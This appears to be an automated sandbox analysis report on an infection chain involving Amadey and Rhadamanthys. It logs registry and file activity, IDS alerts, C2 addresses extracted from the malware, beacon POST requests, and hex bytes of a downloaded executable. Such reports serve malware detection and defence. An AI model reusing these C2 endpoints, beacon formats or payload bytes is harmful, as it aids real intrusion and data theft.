Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Windows\System32\svchost.exe

Directory queried: number of queries: 1013

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0B9CC0 CloseHandle,FindFirstFileExW,FindClose,	1_2_6D0B9CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0D6E3D FindFirstFileExW,	1_2_6D0D6E3D
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0089EF71 FindFirstFileExW,	1_2_0089EF71
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C829CC0 CloseHandle,FindFirstFileExW,FindClose,	2_2_6C829CC0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C846E3D FindFirstFileExW,	2_2_6C846E3D
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0088EF71 FindFirstFileExW,	2_2_0088EF71
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4F4EAD FindFirstFileExW,	5_2_6C4F4EAD
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00619608 FindFirstFileExW,	5_2_00619608
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 15_2_000C9608 FindFirstFileExW,	15_2_000C9608

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Windows\System32\fontdrvhost.exe

Code function: 4x nop then dec esp

10_2_00000203B6860511

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 26MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49708 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49709 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.5:49713 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856149 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M5 : 192.168.2.5:49713 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49727
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49728 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49725 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49720 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49730 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49732
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49733 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49759 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49737 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49774 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49785
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49775
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49786 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49753 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49796 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49795
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49799 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49800
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49735 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49802
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49803 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49804
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49806 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49809
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49828
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49829 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49832 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49826 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49831
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49825
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49808 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49833
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49835 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:1432 -> 192.168.2.5:49839
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49838
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49841 -> 45.93.20.224:80
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 96.9.125.78:443 -> 192.168.2.5:49843
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.5:49837 -> 45.93.20.224:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 96.9.125.78 1432

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkuna
Source: Malware configuration extractor	IPs: 45.93.20.224

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 96.9.125.78 ports 1,2,3,443,4,1432

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic

TCP traffic: 192.168.2.5:49714 -> 96.9.125.78:1432

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 12 Mar 2025 17:02:14 GMTContent-Type: application/octet-streamContent-Length: 1842176Last-Modified: Wed, 05 Mar 2025 00:54:18 GMTConnection: keep-aliveETag: "67c7a0ba-1c1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba a0 c7 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 12 1c 00 00 08 00 00 00 00 00 00 4e 30 1c 00 00 20 00 00 00 40 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 2f 1c 00 57 00 00 00 00 40 1c 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 10 1c 00 00 20 00 00 00 12 1c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 05 00 00 00 40 1c 00 00 06 00 00 00 14 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 1c 00 00 02 00 00 00 1a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 30 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 21 00 00 34 0e 1c 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 28 02 00 00 06 28 03 00 00 06 2a 1b 30 02 00 55 00 00 00 01 00 00 11 7e 01 00 00 04 28 03 00 00 0a 2c 0b 7e 01 00 00 04 17 28 04 00 00 0a 7e 01 00 00 04 28 05 00 00 0a 26 7e 01 00 00 04 72 01 00 00 70 28 06 00 00 0a 0a 7e 02 00 00 04 28 07 00 00 0a 0b 06 07 28 08 00 00 0a 06 7e 01 00 00 04 28 09 00 00 0a de 03 26 de 00 2a 00 00 00 01 10 00 00 00 00 00 00 51 51 00 03 01 00 00 01 1b 30 03 00 aa 00 00 00 02 00 00 11 72 19 00 00 70 0a 1b 8d 0a 00 00 01 13 05 11 05 16 72 1b 00 00 70 a2 11 05 17 72 25 00 00 70 a2 11 05 18 72 2f 00 00 70 a2 11 05 19 72 39 00 00 70 a2 11 05 1a 72 43 00 00 70 a2 11 05 0b 07 13 06 16 13 07 2b 2f 11 06 11 07 9a 0c 7e 01 00 00 04 72 4b 00 00 70 08 28 0a 00 00 0a 17 28 0b 00 00 0a 0d 09 8e 69 16 31 06 09 16 9a 0a 2b 0e 11 07 17 58 13 07 11 07 11 06 8e 69 32 c9 06 28 0c 00 00 0a 2d 24 73 0d 00 00 0a 13 04 11 04 06 6f 0e 00 00 0a 11 04 17 6f 0f 00 00 0a 11 04 28 10 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00

Source: global traffic	HTTP traffic detected: GET /XvpSGEH.png HTTP/1.1Host: i.imgur.comAccept: /
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 45 35 33 31 45 39 43 35 31 37 33 35 41 43 34 37 44 32 38 46 44 38 35 37 35 44 34 36 43 30 31 30 37 46 39 36 44 43 41 38 41 44 38 44 46 33 32 30 32 45 42 45 45 37 31 31 38 43 30 32 32 42 37 37 43 31 31 42 32 35 39 35 35 39 37 38 33 32 34 31 46 30 30 33 44 43 41 36 34 37 31 39 36 35 42 38 39 33 45 36 38 35 46 39 38 42 37 42 44 38 43 33 41 39 46 33 37 31 32 39 34 33 44 43 33 41 30 37 33 46 45 32 33 43 37 41 36 41 34 44 45 45 37 41 37 30 44 31 44 46 35 45 38 44 Data Ascii: r=E531E9C51735AC47D28FD8575D46C0107F96DCA8AD8DF3202EBEE7118C022B77C11B259559783241F003DCA6471965B893E685F98B7BD8C3A9F3712943DC3A073FE23C7A6A4DEE7A70D1DF5E8D
Source: global traffic	HTTP traffic detected: GET /Reader/readerupdate2.exe HTTP/1.1Host: 45.93.20.224
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000160101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU4MTk=Host: 45.93.20.224Content-Length: 85971Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 32 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000170201&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /pNdj30Vs11/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.93.20.224Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
